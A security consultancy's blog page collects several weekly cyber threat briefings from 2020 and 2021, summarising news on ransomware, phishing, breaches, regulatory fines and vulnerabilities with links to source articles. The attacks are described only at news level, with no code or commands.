Threat Intelligence Blog
Contact us to discuss any insights from our Blog, and how we can support you in a tailored threat intelligence report.
Black Arrow Cyber Threat Briefing 22 January 2021
Black Arrow Cyber Threat Briefing 22 January 2021: Ransomware Biggest Cyber Concern; Ransomware Payments Grew 311% In 2020; Cyber Security Spending To Soar In 2021; Ransomware Provides The Perfect Cover For Other Attacks; Gdpr Fines Skyrocket As Eu Gets Tough On Data Breaches; Popular Pdf Reader Has Database Of 77 Miliion Users Leaked Online; Malware Incidents On Remote Devices Increase
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities and cyber related news from the last week.
Top Cyber Headlines of the Week
Ransomware is now the biggest Cyber Security concern for CISOs
Ransomware is the biggest cyber security concern facing businesses, according to those responsible for keeping organisations safe from hacking and cyberattacks. A survey of chief information security officers (CISOs) and chief security officers (CISOs found that ransomware is now viewed as the main cyber security threat to their organisation over the course of the next year. Almost half – 46% – of CISOs and CISOs surveyed said that ransomware or other forms of extortion by outsiders represents the biggest cyber security threat.
https://www.zdnet.com/article/ransomware-is-now-the-biggest-cybersecurity-concern-for-cisos/
Crypto ransomware payments grew 311% in 2020
Crypto payments associated with ransomware grew at least 311% in 2020. “Ransomware” refers to a category of malicious computer programs that force users into paying ransoms. Just 0.34% of all cryptocurrency transactions last year were criminal, down from 2.1% in 2019. But that number is bound to go up, said the firm.
https://decrypt.co/54648/crypto-crime-ransomware-chainalysis-report-2020
The SolarWinds hackers used tactics other groups will copy
One of the most chilling aspects of Russia's recent hacking spree—which breached numerous United States government agencies among other targets—was the successful use of a “supply chain attack” to gain tens of thousands of potential targets from a single compromise at the IT services firm SolarWinds. But this was not the only striking feature of the assault. After that initial foothold, the attackers bored deeper into their victims' networks with simple and elegant strategies. Now researchers are bracing for a surge in those techniques from other attackers.
https://www.wired.com/story/solarwinds-hacker-methods-copycats/
Global Cyber Security spending to soar in 2021
The worldwide cyber security market is set to grow by up to 10% this year to top $60bn, as the global economy slowly recovers from the pandemic. Double-digit growth from $54.7bn in 2020 would be its best-case scenario. However, even in the worst case, cyber security spending would reach 6.6%. That would factor in a deeper-than-anticipated economic impact from lockdowns, although the security market has proven to be remarkably resilient thus far to the pandemic-induced global economic crisis. That said, SMB spending was hit hard last year, along with certain sectors like hospitality, retail and transport.
https://www.infosecurity-magazine.com/news/global-cybersecurity-spending-to/
Cyber criminals publish more than 4,000 stolen Sepa files
Sepa rejected a ransom demand for the attack, which has been claimed by the international Conti ransomware group. Contracts, strategy documents and databases are among the 4,000 files released. The data has been put on the dark web - a part of the internet associated with criminality and only accessible through specialised software.
https://www.bbc.co.uk/news/uk-scotland-55757884
Ransomware provides the perfect cover for other attacks
Look at any list of security challenges that CISOs are most concerned about and you’ll consistently find ransomware on them. It’s no wonder: ransomware attacks cripple organizations due to the costs of downtime, recovery, regulatory penalties, and lost revenue. Unfortunately, cybercriminals have added an extra sting to these attacks: they are using ransomware as a smokescreen to divert security teams from other clandestine activities behind the scenes
https://www.helpnetsecurity.com/2021/01/21/ransomware-cover/
Popular PDF reader has database of 77 million users hacked and leaked online
A threat actor has leaked a 14 GB database online containing over 77 million records relating to thousands of users of the Nitro PDF reader software, with users' email addresses, full names, hashed passwords, company names, IP addresses, and other system-related information.
Ransomware victims that have backups are paying ransoms to stop hackers leaking their stolen data
Some organisations that fall victim to ransomware attacks are paying ransoms to cyber-criminal gangs despite being able to restore their own networks from backups, in order to prevent hackers publishing stolen data. Over the course of the past year, many of the most successful ransomware gangs have added an additional technique in an effort to coerce victims into paying ransoms after compromising their networks – publishing stolen data if a payment isn't received.
GDPR fines skyrocket as EU gets tough on data breaches
Europe’s new privacy protection regime has led to a surge in fines for bad actors, according to research published today. Law firm DLA Piper says that, since January 28th, 2020, the EU has issued around €158.5 million (around $192 million) in financial penalties. That’s a 39-percent increase on the previous 20-month period Piper examined in its report, published this time last year. And as well as the increased fines, the number of breach notifications has shot up by 19 percent across the same 12-month period.
https://www.engadget.com/gdpr-fines-dla-piper-report-144510440.html
Malware incidents on remote devices increase
Devices compromised by malware in 2020, 37% continued accessing corporate emails after being compromised and 11% continued accessing cloud storage, highlighting a need for organizations to better determine how to configure business tools to ensure fast and safe connectivity for all users in 2021.
https://www.helpnetsecurity.com/2021/01/18/malware-incidents-remote-devices/
Threats
Phishing
Malware
Vulnerabilities
Signal and other video chat apps found to have some major security flaws
Automated exploit of critical SAP SolMan vulnerability detected in the wild
List of DNSpooq vulnerability advisories, patches, and update
Dnsmasq vulnerabilities open networking devices, Linux distros to DNS cache poisoning
New FreakOut botnet targets Linux systems running unpatched software
Data Breaches
Denial of Service
Cloud
Privacy
Other News
As usual, contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our weekly ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 13 November 2020
Black Arrow Cyber Threat Briefing 13 November 2020
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities and cyber related news from the last week.
Top Cyber Headlines of the Week
Five Emerging Cyber-Threats to Watch Out for in 2021
What was the driving force behind your company’s digital strategy in 2020? Was it your CEO? Probably not. Your CTO or CISO? Perhaps.
For most organisations, it was COVID-19. In 2019, one company after another said: “work-from-home isn’t an option for us” or “we aren’t interested in shifting operations to the cloud.”
Then everything changed. The pandemic drove a massive shift towards remote work. For many companies, this wasn’t even an option — it was a case of ‘do or die.’
By April 2020, almost half of the American workforce was working from home. As organisations and employees become more comfortable with this, we shouldn’t expect a full return to the traditional in-office model anytime soon, if ever. Work-from-anywhere is the new way of doing business, with employees accessing cloud services, collaborative tools and remote systems from home and public networks – and not always through the safety of a VPN.
https://www.infosecurity-magazine.com/blogs/five-cyber-threats-2021/
Guernsey law firm fined £10,000 for data security breach
Trinity Chambers LLP sent private details about an individual and their family via emails and post, the Data Protection Authority (ODPA) found.
It said a lack of security had given "unconnected" third parties access to the data.
The breach of data by Trinity was the result of "repeated human error", an investigation found.
https://www.bbc.co.uk/news/world-europe-guernsey-54854333
Every employee has a cyber security blind spot
80% of companies say that an increased cyber security risk caused by human factors has posed a challenge during the COVID-19 pandemic, particularly in times of heightened stress.
This is a new report that explores the role employees and their personality play in keeping organisations safe from cyber threats. Including that:
· Cyber crime has increased by 63% since the COVID-19 lockdown was introduced
· Human error has been the biggest cyber security challenge during the COVID-19 pandemic, according to CISOs
· Just a quarter of businesses consider their remote working strategy effective
· 47% of people are concerned about their ability to manage stress during the coronavirus crisis
https://www.helpnetsecurity.com/2020/11/09/cybersecurity-blind-spot/
Zoom settles FTC charges for misleading users about security features
Video conferencing software maker Zoom has reached a deal today with the US Federal Trade Commission to settle accusations that its misled users about some of its security features.
During the height of the COVID-19 pandemic, Zoom had attracted users to its platform with misleading claims that its product supported "end-to-end, 256-bit encryption" and that its service would store recorded calls in an encrypted format.
However, in a complaint filed earlier this year, the investigators found that Zoom's claims were deceptive.
Despite claiming to support end-to-end encrypted (E2EE) calls, Zoom didn't support E2EE calls in the classic meaning of the word.
https://www.zdnet.com/article/zoom-settles-ftc-charges-for-misleading-users-about-security-features/
Threats
Ransomware
How Ryuk Ransomware operators made $34 million from one victim
One hacker group that is targeting high-revenue companies with Ryuk ransomware received $34 million from one victim in exchange for the decryption key that unlocked their computers.
The threat actor is highly proficient at moving laterally inside a compromised network and erasing as much of their tracks as possible before detonating Ryuk ransomware.
Ransomware hits e-commerce platform X-Cart
E-commerce software vendor X-Cart suffered a ransomware attack at the end of October that brought down customer stores hosted on the company's hosting platform.
The incident is believed to have taken place after attackers exploited a vulnerability in a third-party software to gain access to X-Cart's store hosting systems.
https://www.zdnet.com/article/ransomware-hits-e-commerce-platform-x-cart
Linux version of RansomEXX ransomware discovered
A Linux version of the RansomEXX ransomware, marking the first time a major Windows ransomware strain has been ported to Linux to aid in targeted intrusions.
RansomEXX is a relatively new ransomware strain that was first spotted earlier this year in June.
https://www.zdnet.com/article/linux-version-of-ransomexx-ransomware-discovered/
Laptop mega-manufacturer Compal hit by DoppelPaymer ransomware – same one that hit German hospital
Compal, the world’s second-largest white-label laptop manufacturer, has been hit by the file-scrambling DoppelPaymer ransomware gang – and the hackers want $17m in cryptocurrency before they'll hand over the decryption key.
The Taiwanese factory giant, which builds systems for Apple, Lenovo, Dell, and HP, finally admitted malware infected its computers and encrypted its documents after first insisting it had suffered no more than an IT "abnormality" and that its staff had beaten off a cyber-attack.
https://www.theregister.com/2020/11/09/compal_ransomware_report/
Capcom hit by ransomware attack, is reportedly being extorted for $11 million
Earlier this week it emerged that third-party giant Capcom's internal systems had been hacked, though the company claimed that no customer data was affected.
It has now emerged that the publisher was targeted by the Ragnar Locker ransomware, software designed to exfiltrate information from internal networks before encrypting the lot: at which point the victim is locked-out, contacted, and extorted.
Business Email Compromise (BEC)
Jersey business targeted in £130,000 invoice scam
A Jersey building company has been targeted by a sophisticated impersonation scam, which saw fraudsters intercept more than £130,000 in invoice payments.
The owners, who wish to remain anonymous, said they were "left reeling" after realising their email correspondence with a customer had been hacked, and payments diverted to a scam bank account.
After taking swift action, they were able to recover all their money, but they now want to make sure other islanders do not fall victim. They are encouraging businesses in particular to be "extra vigilant".
https://www.itv.com/news/channel/2020-11-13/jersey-business-targeted-in-130000-invoice-scam
Phishing
Smishing attack tells you “mobile payment problem” – don’t fall for it!
As we’ve warned before, phishing via SMS, or smishing for short, is still popular with cybercriminals.
Sure, old-fashioned text messages have fallen out of favour for personal communications, superseded round the world by instant messaging apps such as WhatsApp, WeChat, Instagram, Telegram and Signal.
But for brief, one-off business communications such as “Your home delivery will arrive at 11:30 today” or “Your one-time login code is 217828”, SMS is still a popular and useful messaging system.
That’s because pretty much every mobile phone in the world can receive text messages, regardless of its age, feature set or ability to access the internet.
Even if you’ve got no credit to send messages or make calls, no third-party apps installed, and no Wi-Fi connectivity, SMSes sent to you will still show up.
Malware
Play Store identified as main distribution vector for most Android malware
The official Google Play Store has been identified as the primary source of malware installs on Android devices in a recent academic study — considered the largest one of its kind carried out to date.
Using telemetry data, researchers analysed the origin of app installations on more than 12 million Android devices for a four-month period between June and September 2019.
In total, researchers looked at more than 34 million APK (Android application) installs for 7.9 million unique apps.
This new malware wants to add your Linux servers and IoT devices to its botnet
A new form of malware is targeting Linux servers and Internet of Things (IoT) devices and adding them to a botnet in what appears to be the first stage of a hacking campaign targeting cloud-computing infrastructure – although the purpose of the attacks remains unclear.
The malicious worm has been dubbed Gitpaste-12, reflecting on how it uses GitHub and Pastebin for housing component code and has 12 different means of compromising Linux-based x86 servers, as well as Linux ARM- and MIPS-based IoT devices.
New 'Ghimob' malware can spy on 153 Android mobile applications
Security researchers have discovered a new Android banking trojan that can spy and steal data from 153 Android applications.
Named Ghimob, the trojan is believed to have been developed by the same group behind the Astaroth (Guildma) Windows malware, according to a report published.
Distribution was never carried out via the official Play Store.
Instead, the Ghimob group used emails or malicious sites to redirect users to websites promoting Android apps.
https://www.zdnet.com/article/new-ghimob-malware-can-spy-on-153-android-mobile-applications/
Microsoft Teams Users Under Attack in ‘Fake Updates’ Malware Campaign
Attackers are using ads for fake Microsoft Teams updates to deploy backdoors, which use Cobalt Strike to infect companies’ networks with malware.
The campaign is targeting various types of companies, with recent targets in the K-12 education sector, where organisations are currently dependent on using apps like Teams for videoconferencing due to COVID-19 restrictions.
Cobalt Strike is a commodity attack-simulation tool that’s used by attackers to spread malware, particularly ransomware. Recently, threat actors were seen using Cobalt Strike in attacks exploiting Zerologon, a privilege-elevation flaw that allows attackers to access a domain controller and completely compromise all Active Directory identity services.
https://threatpost.com/microsoft-teams-fakeupdates-malware/161071/
DDoS
DDoS attacks are cheaper and easier to carry out than ever before
DDoS attacks are getting more complex and more sophisticated while also getting cheaper and easier to carry out as cyber criminals take advantage of the sheer number of insecure internet-connected devices.
Distributed Denial of Service attacks have been a problem for many years, with cyber attackers gaining control of armies of devices and directing their internet traffic at targets in order to take the victim offline.
The disruption causes problems for both businesses and individual users who are prevented from accessing digital services they require – and that's especially a problem as 2020's coronavirus pandemic has forced people to be more reliant on digital services than ever before.
https://www.zdnet.com/article/ddos-attacks-are-cheaper-and-easier-to-carry-out-than-ever-before/
IoT
IoT security is a mess. These guidelines could help fix that
The supply chain around the Internet of Things (IoT) has become the weak link in cyber security, potentially leaving organisations open to cyber attacks via vulnerabilities they're not aware of. But a newly released set of guidelines aims to ensure that security forms part of the entire lifespan of IoT product development.
The Guidelines for Securing the IoT – Secure Supply Chain for IoT report from the European Union Agency for Cybersecurity (ENISA) sets out recommendations throughout the entire IoT supply chain to help keep organisations protected from vulnerabilities that can arise when building connected things.
https://www.zdnet.com/article/iot-security-is-a-mess-these-guidelines-could-help-fix-that/
Vulnerabilities
Windows 10 update created a major password problem
A temporary fix for a frustrating Windows 10 bug that prevents software from storing account credentials, meaning the user must re-enter their username and password each time they log-in.
The flaw is also said to delete cookies held in web browsers, preventing websites from memorising credentials and serving bespoke content to the user.
First reported in April, the issue is present in specific builds of Windows 10 version 2004 and affects applications such as Outlook, Chrome, Edge, OneDrive and more.
https://www.techradar.com/news/windows-10-update-made-a-right-mess-of-this-basic-password-feature
Colossal Intel Update Anchored by Critical Privilege-Escalation Bugs
A massive Intel security update this month addresses flaws across a myriad of products – most notably, critical bugs that can be exploited by unauthenticated cyber criminals in order to gain escalated privileges.
These critical flaws exist in products related to Wireless Bluetooth – including various Intel Wi-Fi modules and wireless network adapters – as well as in its remote out-of-band management tool, Active Management Technology (AMT).
Overall, Intel released 40 security advisories on Tuesday, each addressing critical-, high- and medium-severity vulnerabilities across various products. That by far trumps October’s Intel security update, which resolved one high-severity flaw.
https://threatpost.com/intel-update-critical-privilege-escalation-bugs/161087/
Hackers are exploiting unpatched VoIP flaws to compromise business accounts
A hacking campaign has compromised VoIP (Voice over Internet Protocol) phone systems at over 1,000 companies around the world over the past year in a campaign designed to make profit from selling compromised accounts.
While the main purpose appears to be dialling premium rate numbers owned by attackers or selling phone numbers and call plans that others can use for free, access to VoIP systems could provide cyber criminals with the ability to conduct other attacks, including listening to private calls, cryptomining, or even using compromised systems as a steppingstone towards much more intrusive campaigns.
One hacking group has compromised the VoIP networks of almost 1,200 organisations in over 20 countries by exploiting the vulnerability, with over half the victims in the UK. Industries including government, military, insurance, finance and manufacturing are believed to have fallen victim to the campaign
Google patches two more Chrome zero-days
Google has released today Chrome version 86.0.4240.198 to patch two zero-day vulnerabilities that were exploited in the wild.
These two bugs mark the fourth and fifth zero-days that Google has patched in Chrome over the past three weeks.
The difference this time is that while the first three zero-days were discovered internally by Google security researchers, these two new zero-days came to Google's attention after tips from anonymous sources.
https://www.zdnet.com/article/google-patches-two-more-chrome-zero-days/
Data Breaches
Ticketmaster fined £1.25m over payment data breach
Ticketmaster UK has been fined £1.25m for failing to keep its customers' personal data secure.
The fine was issued by the Information Commissioner's Office (ICO) following a cyber-attack on the Ticketmaster website in 2018.
The ICO said personal information and payment details had potentially been stolen from more than nine million customers in Europe.
https://www.bbc.co.uk/news/technology-54931873
Millions of Hotel Guests Worldwide Caught Up in Mass Data Leak
A cloud misconfiguration affecting users of a popular reservation platform threatens travellers with identity theft, scams, credit-card fraud and vacation-stealing.
A widely used hotel reservation platform has exposed 10 million files related to guests at various hotels around the world, thanks to a misconfigured Amazon Web Services S3 bucket. The records include sensitive data, including credit-card details.
Prestige Software’s “Cloud Hospitality” is used by hotels to integrate their reservation systems with online booking websites like Expedia and Booking.com.
https://threatpost.com/millions-hotel-guests-worldwide-data-leak/161044/
DWP exposed 6,000 people’s data online for two years
The Department for Work and Pensions (DWP) has removed the personal details of thousands of people after they were exposed online for two years.
The files, published in March and June 2018, listed routine payments to the outsourcing giant Capita and included the National Insurance (NI) numbers of approximately 6,000 people, according to the Mirror. These individuals were believed to be applying for the disability benefit, PIP. No other personal data was exposed in the incident.
https://www.itpro.co.uk/security/data-breaches/357724/dwp-data-breach-exposed-6000-ni-numbers
Data breach at Mashable leaks users’ personal information online
Technology and culture news website Mashable have announced that the personal data of users has been discovered in a leaked database posted on the internet.
In a statement issued this week, Mashable confirmed that a database containing information from readers who made use of the platform’s social media sign-in feature had been found online.
The media company said that “a hacker known for targeting websites and apps” was responsible for the breach. The suspect has not been named.
Leaked data is said to include the full names, locations, email addresses, genders, IP addresses, and links to social media profiles of users.
Other News
Try to avoid thinking of the internet as a flashy new battlefield, warns former NCSC chief
https://www.theregister.com/2020/11/11/ciaran_martin_speech_cyber_policy/
Microsoft says three APTs have targeted seven COVID-19 vaccine makers
https://www.zdnet.com/article/microsoft-says-three-apts-have-targeted-seven-covid-19-vaccine-makers/
New stealthy hacker-for-hire group mimics state-backed attackers
As usual, contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our weekly ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Cyber Weekly Flash Briefing for 27 March 2020 – Half of UK firms suffer breach last year, COVID19 drives phishing up 667%, WHO targeted, Windows zero-day, ransom refuser’s data published online
Cyber Weekly Flash Briefing for 27 March 2020 – Half of UK firms suffer breach last year, COVID19 drives phishing up 667%, WHO targeted, Windows zero-day, ransom refuser’s data published online
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Cyber Flash Briefing 60 second video version
The Importance of Maintaining Good Cyber Hygiene During the Coronavirus Crisis
Businesses are making significant changes in response to the virus, including asking employees to work from home for the first time. These new practices have often been implemented as quickly as possible, with a priority on keeping the business operations going.
At the same time, the cyber and information security consultants at Black Arrow are seeing reports from specialist intelligence and the wider media which show cyber criminals are feasting on the current chaos as they target employees and companies who let their guard down.
‘Cyber criminals usually target people, not technology, to get into their employer’s systems. Companies need to ensure they consider all the basic risks to prevent this, and implement layers of defence that start with the user.
Read more here: https://guernseypress.com/news/2020/03/24/maintaining-good-cyber-hygiene/
Half of all UK Firms and Three-Quarters of Large Firms Suffered Security Breach Last Year
Nearly half (46%) of UK firms reported suffering a security breach or cyber-attack over the past year, an increase on previous years, but they are getting better at recovering from and deflecting such blows, according to the government.
The annual Cyber Security Breaches Survey revealed an increase in the overall volume of businesses reporting incidents, up from 32%. The number of medium (68%) and large (75%) businesses reporting breaches or attacks also jumped, from 60% and 61% respectively.
This puts the 2020 report’s findings in line with the first government analysis in 2017, it claimed.
Of those businesses that reported incidents, more are experiencing these at least three times a week than in 2017 (32% versus 22%).
The government also claimed that organisations are experiencing more phishing attacks (from 72% to 86%) whilst fewer are seeing malware (from 33% to 16%) than three years ago.
More here: https://www.infosecurity-magazine.com/news/threequarters-firms-security/
#COVID19 Drives Phishing Emails Up 667% in Under a Month
Phishing emails have spiked by over 600% since the end of February as cyber-criminals look to capitalize on the fear and uncertainty generated by the COVID-19 pandemic.
A security vendor observed just 137 incidents in January, rising to 1188 in February and 9116 so far in March. Around 2% of the 468,000 global email attacks detected by the firm were classified as COVID-19-themed.
As is usually the case, the attacks used widespread awareness of the subject to trick users into handing over their log-ins and financial information, and/or unwittingly downloading malware to their computers
Of the COVID-19 phishing attacks, 54% were classified as scams, 34% as brand impersonation attacks, 11% blackmail and 1% as business email compromise (BEC).
As well as the usual lures to click through for more information on the pandemic, some scammers are claiming to sell cures and/or face-masks, while others try to elicit investment in companies producing vaccines, or donations to fight the virus and provide support to victims.
This is a new low for cyber-criminals, who are acting like piranha fish, cowardly attacking people on mass when they are at their most vulnerable. It’s vital that the public remain vigilant against scam emails during this challenging time.
More here: https://www.infosecurity-magazine.com/news/covid19-drive-phishing-emails-667/
Attackers exploiting critical zero-day Windows flaw
Microsoft has discovered a severe vulnerability in all supported versions of Windows, which enables criminals to remotely run malware – including ransomware – on a target machine.
According to the report, the security vulnerability has not been previously disclosed and there is currently no fix.
The “critical” vulnerability revolves around how the operating system handles and renders fonts. All it takes is for the victim to open or preview a malicious document, and the attacker can remotely run different forms of malware.
Microsoft said the vulnerability is being exploited in the wild, and different hacking groups are initiating “limited, targeted attacks”.
Although there is as yet no patch, the company announced a temporary workaround for affected Windows users, which involves disabling the Preview and Details panes in Windows explorers.
Read more here: https://www.itproportal.com/news/attackers-exploiting-critical-zero-day-windows-flaw/
WHO Targeted in Espionage Attempt, COVID-19 Cyberattacks Spike
The DarkHotel group could have been looking for information on tests, vaccines or trial cures.
The World Health Organization (WHO) has attracted the notice of cybercriminals as the worldwide COVID-19 pandemic continues to play out, with a doubling of attacks recently, according to officials there. Problematically, evidence has also now apparently surfaced that the DarkHotel APT group has tried to infiltrate its networks to steal information.
A cyber security researcher told Reuters that he personally observed a malicious site being set up on March 13 that mimicked the WHO’s internal email system. Its purpose was to steal passwords from multiple agency staffers, and noted that he realised “quite quickly that this was a live attack on the World Health Organization in the midst of a pandemic.”
The attack appeared to be aimed at achieving a foothold at the agency rather than being an end unto itself. The targeting infrastructure seems to focus on certain types of healthcare and humanitarian organisations that are uncommon for cybercriminals and this could suggest the actor or actors behind the attacks are more interested in gathering intelligence, rather than being financially motivated.
Read the full article here: https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/
Stolen data of company that refused REvil ransom payment now on sale
Operators of the Sodinokibi (aka Sodin or REvil) Ransomware as a Service (RaaS) recently published over 12GB of data that allegedly belongs to one of its victims – Brooks International – that refused to pay ransom.
RaaS is the malware for lazy crooks who just want to launch attacks at the press of a button: it enables novice cybercriminals to build automated campaigns using third-party kits sold on the dark web. They don’t have to break a sweat by learning about malware, teaching themselves how encryption works, writing ransomware code, running an anonymous webserver on Tor to collect the loot, distributing decryption keys, or otherwise getting their hands dirty with technical details.
Sodinokibi – a GandCrab derivative blamed for numerous attacks that took place last year – is a prime example of RaaS.
IT security report finds 97% of enterprise networks have suspicious network activity
A study using advanced network traffic analysis tools, found that 97% of the surveyed companies show evidence of suspicious activity in their network traffic and that 81% of the companies were being subject to malicious activity.
More here: https://www.techrepublic.com/article/it-security-report-finds-97-have-suspicious-network-activity/
Concern over Zoom video conferencing after MoD bans it over security fears
Concerns have been raised over the security of video conferencing service Zoom after the Ministry of Defence banned staff from using it.
Downing Street published pictures of Prime Minister Boris Johnson using the app to continue holding Cabinet meetings with senior MPs – where sensitive information like matters of national security are discussed – while observing rules on social distancing to curb the coronavirus outbreak.
But MoD staff were told this week that use of the software was being suspended with immediate effect while ‘security implications’ were investigated, with users reminded of the need to be ‘cautious about cyber resilience’ in ‘these exceptional times’.
One source commented that ‘it is astounding that thousands of MoD staff have been banned from using Zoom only to find a sensitive Government meeting like that of the Prime Minister’s Cabinet is being conducted over it’.
A message to MoD staff said: ‘We are pausing the use of Zoom, an internet-based video conferencing service, with immediate effect whilst we investigate security implications that come with it.’ The email added that a decision will then be made about whether to continue using the programme.
More here: https://metro.co.uk/2020/03/25/concern-zoom-video-conferencing-mod-bans-security-fears-12455327/
Adobe issues emergency fix for file-munching bug
Adobe has released another security patch outside of its usual routine this month to deal with a strange bug that can allow attackers to delete victims’ files.
The file-deleting bug stems from a time-of-check to time-of-use race condition vulnerability, which happens when two system operations try to access shared data at the same time. That allows an attacker to manipulate files on the victim’s system. The company warned that successful exploitation could lead to arbitrary file deletion.
To successfully exploit the flaw, an attacker would need to convince a victim to open a malicious file, Adobe has said.
More here: https://nakedsecurity.sophos.com/2020/03/26/adobe-issues-emergency-fix-for-file-munching-bug/
Emerging Chinese APT Group ‘TwoSail Junk’ Mounts Mass iPhone Surveillance Campaign
The malware, the work of a new APT called TwoSail Junk, allows deep surveillance and total control over iOS devices.
A recently discovered, mass-targeted watering-hole campaign has been aiming at Apple iPhone users in Hong Kong – infecting website visitors with a newly developed custom surveillance malware. The bad code – the work of a new APT called “TwoSail Junk” – is delivered via a multistage exploit chain that targets iOS vulnerabilities in versions 12.1 and 12.2 of Apple’s operating system, according to researchers.
Watering-hole campaigns make use of malicious websites that lure visitors in with targeted content – cyberattackers often post links to that content on discussion boards and on social media to cast a wide net. When visitors click through to a malicious website, background code will then infect them with malware.
Read the full article here: https://threatpost.com/emerging-apt-mounts-mass-iphone-surveillance-campaign/154192/
New attack on home routers sends users to spoofed sites that push malware
A recently discovered hack of home and small-office routers is redirecting users to malicious sites that pose as COVID-19 informational resources in an attempt to install malware that steals passwords and cryptocurrency credentials, researchers said on Wednesday.
The compromises are hitting Linksys routers and D-Link devices.
It remains unclear how attackers are compromising the routers. The researchers suspect that the hackers are guessing passwords used to secure routers’ remote management console when that feature is turned on. It was also hypothesized that compromises may be carried out by guessing credentials for users’ Linksys cloud accounts.
Russia’s FSB wanted its own IoT botnet
If you thought the Mirai botnet was bad, what about a version under the control of Russia’s military that it could point like an electronic cannon at people it didn’t like? That’s the prospect we could face after the reported emergence of secret Russian project documents online last week.
The documents, which come from hacking group Digital Revolution but haven’t been verified, suggest that Russia’s Federal Security Service (in Russian, the FSB), has been working on an internet of things (IoT) botnet of its own called Fronton.
Mirai was a botnet that infected IoT devices by the million, taking advantage of default login credentials to co-opt them for attackers. They then pointed it at DNS service provider Dyn, mounting a DDoS attack that took down large internet services for hours.
More here: https://nakedsecurity.sophos.com/2020/03/24/russias-fsb-wanted-its-own-iot-botnet/
Cyber Weekly Flash Briefing for 06 March 2020 phishing scams exploiting coronavirus, Boots Advantage and Tesco Clubcard hit in the same week, Android patches, ransomware takes legal giant offline
Cyber Weekly Flash Briefing for 06 March 2020 - phishing scams exploiting coronavirus, Boots Advantage and Tesco Clubcard hit in the same week, Android patches, ransomware takes legal giant offline
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Nasty phishing scams aim to exploit coronavirus fears
Phoney emails about health advice and more are being used to steal login credentials and financial details.
Cyber criminals are aiming to take advantage of fears over coronavirus as a means of conducting phishing attacks and spreading malware, along with stealing login credentials and credit card details.
Cybersecurity companies have identified a number of campaigns by hackers who are attempting to exploit concerns about the COVID-19 outbreak for their own criminal ends. Crooks often use current affairs to make their scams more timely.
Researchers have identified a Trickbot banking trojan campaign specifically targeting Italian email addresses in an attempt to play on worries about the virus. The phishing email comes with a Word document which claims to contain advice on how to prevent infection – but this attachment is in fact a Visual Basic for Applications (VBA) script which drops a new variant of Trickbot onto the victim's machine.
The message text claims to offer advice from the World Health Organization (WHO) in a Word document which claims to be produced using an earlier version of Microsoft Word which means the user needs to enable macros in order to see the content. By doing this, it executes a chain of commands which installs Trickbot on the machine.
Read more here: https://www.zdnet.com/article/nasty-phishing-scams-aim-to-exploit-coronovirus-fears/
Backdoor malware is being spread through fake security certificate alerts
Victims of this new technique are invited to install a malicious "security certificate update" when they visit compromised websites.
Backdoor and Trojan malware variants are being distributed through a new phishing technique that attempts to lure victims into accepting an "update" to website security certificates.
Certificate Authorities (CAs) distribute SSL/TLS security certificates for improved security online by providing encryption for communication channels between a browser and server -- especially important for domains providing e-commerce services -- as well as identity validation, which is intended to instill trust in a domain.
Read the full article here: https://www.zdnet.com/article/backdoor-malware-is-being-spread-through-fake-security-certificate-alerts/
Boots Advantage and Tesco Clubcard both suffer data breaches in same week
Boots has blocked all Advantage card holders from ‘paying with points’ after 150,000 accounts were subjected to attempted hacks using stolen passwords.
The news comes just days after Tesco said it would issue replacement Clubcards to more than 620,000 customers after a similar security breach.
Read more here: https://www.which.co.uk/news/2020/03/boots-advantage-card-tesco-clubcard-both-suffer-data-breaches-in-same-week/
Academics find 30 file upload vulnerabilities in 23 web apps, CMSes, and forums
Through the use of an automated testing toolkit, a team of South Korean academics has discovered 30 vulnerabilities in the file upload mechanisms used by 23 open-source web applications, forums, store builders, and content management systems (CMSes).
When present in real-world web apps, these types of vulnerabilities allow hackers to exploit file upload forms and plant malicious files on a victim's servers.
These files could be used to execute code on a website, weaken existing security settings, or function as backdoors, allowing hackers full control over a server.
Read the full article here: https://www.zdnet.com/article/academics-find-30-file-upload-vulnerabilities-in-23-web-apps-cmses-and-forums/
UK Home Office breached GDPR 100 times through botched management of EU Settlement Scheme
ID cards sent to the wrong addresses, third party data disclosures, and lost passports are only some examples of mishandling.
The UK Home Office has breached European data protection regulations at least 100 times in its handling of the EU Settlement Scheme (EUSS).
IDs have been lost, documents misplaced, passports have gone missing, and applicant information has been disclosed to third parties without permission in some of the cases, according to a new report.
Read more here: https://www.zdnet.com/article/uk-home-office-breached-gdpr-100-times-through-botched-handling-of-eu-settlement-scheme/
Legal services giant Epiq Global offline after ransomware attack
The company, which provides legal counsel and administration that counts banks, credit giants, and governments as customers, confirmed the attack hit on February 29.
“As part of our comprehensive response plan, we immediately took our systems offline globally to contain the threat and began working with a third-party forensic firm to conduct an independent investigation,” a company statement read. “Our technical team is working closely with world class third-party experts to address this matter, and bring our systems back online in a secure manner, as quickly as possible.”
The company’s website, however, says it was “offline to perform maintenance.”
A source with knowledge of the incident but who was not authorized to speak to the media said the ransomware hit the organization’s entire fleet of computers across its 80 global offices.
Read more here: https://techcrunch.com/2020/03/02/epiq-global-ransomware/
Android Patch Finally Lands for Widespread “MediaTek-SU” Vulnerability
Android has quietly patched a critical security flaw affecting millions of devices containing chipsets from Taiwanese semiconductor MediaTek: a full year after the security vulnerability – which gives an attacker root privileges – was first reported.
More here: https://www.cbronline.com/news/android-patch-mediatek-su
5G and IoT security: Why cybersecurity experts are sounding an alarm
Without regulation and strong proactive measures, 5G networks remain vulnerable to cyberattacks, and the responsibility falls on businesses and governments.
